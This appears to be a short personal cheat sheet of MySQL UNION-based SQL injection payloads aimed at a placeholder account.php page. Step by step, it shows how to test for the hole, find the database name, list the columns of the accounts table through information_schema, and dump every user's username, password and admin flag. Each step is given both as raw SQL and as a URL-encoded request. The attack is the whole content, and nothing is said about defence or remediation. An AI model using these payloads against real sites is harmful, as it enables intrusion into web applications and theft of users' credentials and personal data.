/other/

Sql injection stuff - mysql

2016-11-22 23:33:51


-- original url
-- www.your_page.com/account.php?username=xxx

-- sql injection test
-- www.your_page.com/account.php?username=xxx'

-- original query
SELECT username, mysignature FROM accounts WHERE username = 'xxx';

-- we are guessing that we have password column in accounts table

SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT username, password FROM accounts; -- ';

-- url format
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20username,password%20FROM%20accounts;%20--%20';

-- sql injection test 2
-- www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20username,password%20FROM%20accounts;%20--%20
-- if it works ... well

-- no more guessing, we have to check the column list for accounts table

-- check main db name
SELECT DATABASE(),DATABASE();
-- sql that we want to execute
SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT DATABASE(),DATABASE() -- ';
-- url format
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20DATABASE(),DATABASE()%20--%20';
-- url
--  www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20DATABASE(),DATABASE()%20--%20';
--
--
-- get list of columns for table
SELECT column_name,column_name FROM information_schema.columns WHERE table_name='accounts';
-- sql that we want to execute
SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT column_name,column_name FROM information_schema.columns WHERE table_name='accounts'; -- ';
-- url format
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20column_name,column_name%20FROM%20information_schema.columns%20WHERE%20table_name='accounts';%20--%20';
-- url
--  www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20column_name,column_name%20FROM%20information_schema.columns%20WHERE%20table_name='accounts';%20--%20';
--
-- get all accounts data in two column
SELECT group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname) SEPARATOR '/'), null  FROM accounts;
-- sql that we want to execute
SELECT username, mysignature FROM accounts WHERE username = 'xxx' UNION SELECT group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname) SEPARATOR '/'), null  FROM accounts;
-- url format
SELECT username, mysignature FROM accounts WHERE username = 'xxx'%20UNION%20SELECT%20group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname)%20SEPARATOR%20'/'),%20null%20FROM%20accounts;
-- url
--  www.your_page.com/account.php?username=xxx'%20UNION%20SELECT%20group_concat(concat(cid,'-',username,'-',password,'-',mysignature,'-',is_admin,'-',firstname,'-',lastname)%20SEPARATOR%20'/'),%20null%20FROM%20accounts;%20--%20